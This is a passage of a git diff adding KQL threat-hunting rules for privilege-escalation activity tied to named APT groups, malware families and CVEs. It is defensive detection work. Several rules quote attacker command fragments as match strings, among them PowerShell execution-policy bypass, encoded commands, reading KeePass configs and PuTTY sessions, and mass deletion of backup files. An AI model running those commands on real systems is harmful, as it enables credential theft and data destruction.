((ProcessCommandLine contains "Sens Api" or ProcessCommandLine contains "OneDrive") and (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql new file mode 100644 index 00000000..5fcfcb55 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql @@ -0,0 +1,10 @@ +// Title: Leviathan Registry Key Activity +// Author: Aidan Bracher +// Date: 2020-07-07 +// Level: critical +// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql new file mode 100644 index 00000000..3470acc4 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql @@ -0,0 +1,13 @@ +// Title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-12-19 +// Level: high +// Description: Detects the execution of more.com and vbc.exe in the process tree. +This behavior was observed by a set of samples related to Lummac Stealer. +The Lummac payload is injected into the vbc.exe process. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath endswith "\\vbc.exe" or ProcessVersionInfoOriginalFileName =~ "vbc.exe") and InitiatingProcessFolderPath endswith "\\more.com" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql new file mode 100644 index 00000000..f2124a96 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql @@ -0,0 +1,16 @@ +// Title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation +// Author: Swachchhanda Shrawn Poudel (Nextron Systems) +// Date: 2025-10-02 +// Level: high +// Description: Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463. +This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations. +When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment, +potentially leading to arbitrary code execution and privilege escalation. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2025-32463, detection.emerging-threats +// False Positives: +// - Backup locations + +DeviceFileEvents +| where FolderPath endswith "/etc/nsswitch.conf" and (not(FolderPath =~ "/etc/nsswitch.conf")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql new file mode 100644 index 00000000..9f188472 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql @@ -0,0 +1,12 @@ +// Title: OilRig APT Activity +// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +// Date: 2018-03-23 +// Level: critical +// Description: Detects OilRig activity as reported by Nyotron in their March 2018 report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "nslookup.exe" and ProcessCommandLine contains "-q=TXT") and InitiatingProcessFolderPath endswith "\\local\\microsoft\\Taskbar\\autoit3.exe") or (ProcessCommandLine contains "SC Scheduled Scan" and ProcessCommandLine contains "\\microsoft\\Taskbar\\autoit3.exe") or ((ProcessCommandLine contains "i" or ProcessCommandLine contains "u") and FolderPath =~ "C:\\Windows\\system32\\Service.exe") or (FolderPath contains "\\Windows\\Temp\\DB\\" and FolderPath endswith ".exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql new file mode 100644 index 00000000..bd67c52b --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql @@ -0,0 +1,12 @@ +// Title: OilRig APT Registry Persistence +// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +// Date: 2018-03-23 +// Level: critical +// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql new file mode 100644 index 00000000..2c629abe --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql @@ -0,0 +1,12 @@ +// Title: Operation Wocao Activity +// Author: Florian Roth (Nextron Systems), frack113 +// Date: 2019-12-20 +// Level: high +// Description: Detects activity mentioned in Operation Wocao report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.discovery, attack.t1012, attack.defense-evasion, attack.t1036.004, attack.t1027, attack.execution, attack.t1053.005, attack.t1059.001, detection.emerging-threats +// False Positives: +// - Administrators that use checkadmin.exe tool to enumerate local administrators + +DeviceProcessEvents +| where ProcessCommandLine contains "checkadmin.exe 127.0.0.1 -all" or ProcessCommandLine contains "netsh advfirewall firewall add rule name=powershell dir=in" or ProcessCommandLine contains "cmd /c powershell.exe -ep bypass -file c:\\s.ps1" or ProcessCommandLine contains "/tn win32times /f" or ProcessCommandLine contains "create win32times binPath=" or ProcessCommandLine contains "\\c$\\windows\\system32\\devmgr.dll" or ProcessCommandLine contains " -exec bypass -enc JgAg" or (ProcessCommandLine contains "type " and ProcessCommandLine contains "keepass\\KeePass.config.xml") or ProcessCommandLine contains "iie.exe iie.txt" or (ProcessCommandLine contains "reg query HKEY_CURRENT_USER\\Software\\" and ProcessCommandLine contains "\\PuTTY\\Sessions\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql new file mode 100644 index 00000000..58ba9e91 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql @@ -0,0 +1,12 @@ +// Title: Pingback Backdoor Activity +// Author: Bhabesh Raj +// Date: 2021-05-05 +// Level: high +// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "config" and ProcessCommandLine contains "msdtc" and ProcessCommandLine contains "start" and ProcessCommandLine contains "auto") and InitiatingProcessFolderPath endswith "\\updata.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql new file mode 100644 index 00000000..8d1491ae --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql @@ -0,0 +1,12 @@ +// Title: Pingback Backdoor DLL Loading Activity +// Author: Bhabesh Raj +// Date: 2021-05-05 +// Level: high +// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath =~ "C:\\Windows\\oci.dll" and InitiatingProcessFolderPath endswith "\\msdtc.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql new file mode 100644 index 00000000..5a037b2f --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql @@ -0,0 +1,12 @@ +// Title: Pingback Backdoor File Indicators +// Author: Bhabesh Raj +// Date: 2021-05-05 +// Level: high +// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "updata.exe" and FolderPath =~ "C:\\Windows\\oci.dll" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql new file mode 100644 index 00000000..1f97923c --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential ACTINIUM Persistence Activity +// Author: Andreas Hunkeler (@Karneades) +// Date: 2022-02-07 +// Level: high +// Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "create" and ProcessCommandLine contains "wscript" and ProcessCommandLine contains " /e:vbscript" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql new file mode 100644 index 00000000..a65a97a6 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql @@ -0,0 +1,10 @@ +// Title: Potential CVE-2021-41379 Exploitation Attempt +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-22 +// Level: critical +// Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2021-41379, detection.emerging-threats + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\elevation_service.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql new file mode 100644 index 00000000..e4dfdf8c --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql @@ -0,0 +1,10 @@ +// Title: Potential CVE-2023-21554 QueueJumper Exploitation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-12 +// Level: high +// Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, cve.2023-21554, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\Windows\\System32\\mqsvc.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql new file mode 100644 index 00000000..59154956 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql @@ -0,0 +1,14 @@ +// Title: Potential CVE-2024-35250 Exploitation Activity +// Author: @eyezuhk Isaac Fernandes +// Date: 2025-02-19 +// Level: medium +// Description: Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2024-35250, detection.emerging-threats +// False Positives: +// - Legitimate applications that use Windows Stream Interface APIs. +// - Media applications that use DirectShow filters. + +DeviceImageLoadEvents +| where FolderPath endswith "\\ksproxy.ax" and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\app-" and InitiatingProcessFolderPath contains "\\Discord.exe") or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Opera\\opera.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql new file mode 100644 index 00000000..195a4faf --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql @@ -0,0 +1,12 @@ +// Title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) +// Author: Nisarg Suthar +// Date: 2025-08-01 +// Level: high +// Description: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of a RCE vulnerability such as CVE-2025-54309. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1068, attack.t1190, cve.2025-54309, detection.emerging-threats +// False Positives: +// - Legitimate administrative command execution + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\crushftp.exe" and (((ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe") and FolderPath endswith "\\cmd.exe") or (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql new file mode 100644 index 00000000..869374b7 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql @@ -0,0 +1,13 @@ +// Title: Potential KamiKakaBot Activity - Winlogon Shell Persistence +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior +// Date: 2024-03-22 +// Level: high +// Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryValueData contains "-nop -w h" and RegistryValueData contains "$env" and RegistryValueData contains "explorer.exe" and RegistryValueData contains "Start-Process") and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql new file mode 100644 index 00000000..7365fe39 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql @@ -0,0 +1,14 @@ +// Title: Potential Pikabot Hollowing Activity +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-10-27 +// Level: high +// Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. +The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\sndvol.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wwahost.exe") and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not((FolderPath endswith "\\sndvol.exe" and InitiatingProcessCommandLine contains "mmsys.cpl"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql new file mode 100644 index 00000000..ae3bceec --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential PlugX Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2017-06-12 +// Level: high +// Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.s0013, attack.defense-evasion, attack.t1574.001, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath endswith "\\CamMute.exe" and (not((FolderPath contains "\\Lenovo\\Communication Utility\\" or FolderPath contains "\\Lenovo\\Communications Utility\\")))) or (FolderPath endswith "\\chrome_frame_helper.exe" and (not(FolderPath contains "\\Google\\Chrome\\application\\"))) or (FolderPath endswith "\\dvcemumanager.exe" and (not(FolderPath contains "\\Microsoft Device Emulator\\"))) or (FolderPath endswith "\\Gadget.exe" and (not(FolderPath contains "\\Windows Media Player\\"))) or (FolderPath endswith "\\hcc.exe" and (not(FolderPath contains "\\HTML Help Workshop\\"))) or (FolderPath endswith "\\hkcmd.exe" and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysNative\\" or FolderPath contains "\\SysWow64\\")))) or (FolderPath endswith "\\Mc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit")))) or (FolderPath endswith "\\MsMpEng.exe" and (not((FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Windows Defender\\" or FolderPath contains "\\AntiMalware\\")))) or (FolderPath endswith "\\msseces.exe" and (not((FolderPath contains "\\Microsoft Security Center\\" or FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Microsoft Security Essentials\\")))) or (FolderPath endswith "\\OInfoP11.exe" and (not(FolderPath contains "\\Common Files\\Microsoft Shared\\"))) or (FolderPath endswith "\\OleView.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\")))) or (FolderPath endswith "\\rc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\" or FolderPath contains "\\Microsoft.NET\\")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql new file mode 100644 index 00000000..71a90158 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Ryuk Ransomware Activity +// Author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-12-16 +// Level: high +// Description: Detects Ryuk ransomware activity +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "del /s /f /q c:\\" and ProcessCommandLine contains "*.bac" and ProcessCommandLine contains "*.bak" and ProcessCommandLine contains "*.bkf") or ((ProcessCommandLine contains "samss" or ProcessCommandLine contains "audioendpointbuilder" or ProcessCommandLine contains "unistoresvc_" or ProcessCommandLine contains "AcrSch2Svc") and (ProcessCommandLine contains " stop " and ProcessCommandLine contains " /y") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "C:\\users\\Public\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql new file mode 100644 index 00000000..d3d57bb1 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql @@ -0,0 +1,10 @@ +// Title: Potential SystemNightmare Exploitation Attempt +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-11 +// Level: critical +// Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "printnightmare.gentilkiwi.com" or ProcessCommandLine contains " /user:gentilguest " or ProcessCommandLine contains "Kiwi Legit Printer" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql new file mode 100644 index 00000000..8ccccbdf --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql @@ -0,0 +1,15 @@ +// Title: Serpent Backdoor Payload Execution Via Scheduled Task +// Author: @kostastsale +// Date: 2022-03-21 +// Level: high +// Description: Detects post exploitation execution technique of the Serpent backdoor. +According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. +It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.006, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "[System/EventID=" and ProcessCommandLine contains "/create" and ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/ec" and ProcessCommandLine contains "/so" and ProcessCommandLine contains "/tn run") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql b/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql new file mode 100644 index 00000000..35978f87 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql @@ -0,0 +1,12 @@ +// Title: Small Sieve Malware CommandLine Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-19 +// Level: high +// Description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine endswith ".exe Platypus" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql new file mode 100644 index 00000000..9b20865f --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Sysmon as Execution Parent +// Author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault) +// Date: 2022-11-10 +// Level: high +// Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2022-41120, detection.emerging-threats + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\Sysmon.exe" or InitiatingProcessFolderPath endswith "\\Sysmon64.exe") and (not(((FolderPath contains ":\\Windows\\Sysmon.exe" or FolderPath contains ":\\Windows\\Sysmon64.exe" or FolderPath contains ":\\Windows\\System32\\conhost.exe" or FolderPath contains ":\\Windows\\System32\\WerFault.exe" or FolderPath contains ":\\Windows\\System32\\WerFaultSecure.exe" or FolderPath contains ":\\Windows\\System32\\wevtutil.exe" or FolderPath contains ":\\Windows\\SysWOW64\\wevtutil.exe") or isnull(FolderPath) or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe") and FolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql new file mode 100644 index 00000000..1d44572a --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql @@ -0,0 +1,10 @@ +// Title: Suspicious VBScript UN2452 Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-05 +// Level: high +// Description: Detects suspicious inline VBScript keywords as used by UNC2452 +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "Execute" and ProcessCommandLine contains "CreateObject" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close" and ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion") and (not(ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql b/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql new file mode 100644 index 00000000..e342028a --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql @@ -0,0 +1,10 @@ +// Title: TAIDOOR RAT DLL Load +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-30 +// Level: high +// Description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1055.001, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "dll,MyStart" or ProcessCommandLine contains "dll MyStart") or (ProcessCommandLine endswith " MyStart" and ProcessCommandLine contains "rundll32.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql b/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql new file mode 100644 index 00000000..19ca8603 --- 